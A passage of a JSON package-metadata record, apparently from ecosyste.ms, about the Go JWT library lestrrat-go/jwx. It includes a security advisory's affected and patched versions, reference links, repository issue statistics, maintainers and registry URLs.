verified, so it is not an immediate attack.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-06-14T17:24:36.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq","https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103","https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66","https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213","https://github.com/advisories/GHSA-rm8v-mxj3-5rmq"],"source_kind":"github","identifiers":["GHSA-rm8v-mxj3-5rmq"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2023-06-14T18:03:33.328Z","updated_at":"2026-06-03T15:10:10.524Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.26","vulnerable_version_range":"\u003c= 1.2.25"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.11","vulnerable_version_range":"\u003c= 2.0.10"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2","docker_dependents_count":120,"docker_downloads_count":421751126,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}}],"commits":null,"issues":{"table":{}},"events":null,"keywords":["go","golang","jwe","jwk","jws","jwt","oidc"],"dependencies":null,"score":29.471334168688756,"created_at":"2026-05-14T05:04:35.697Z","updated_at":"2026-06-13T20:31:32.353Z","avatar_url":"https://github.com/lestrrat-go.png","language":"Go","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/372104","html_url":"https://summary.ecosyste.ms/projects/372104"}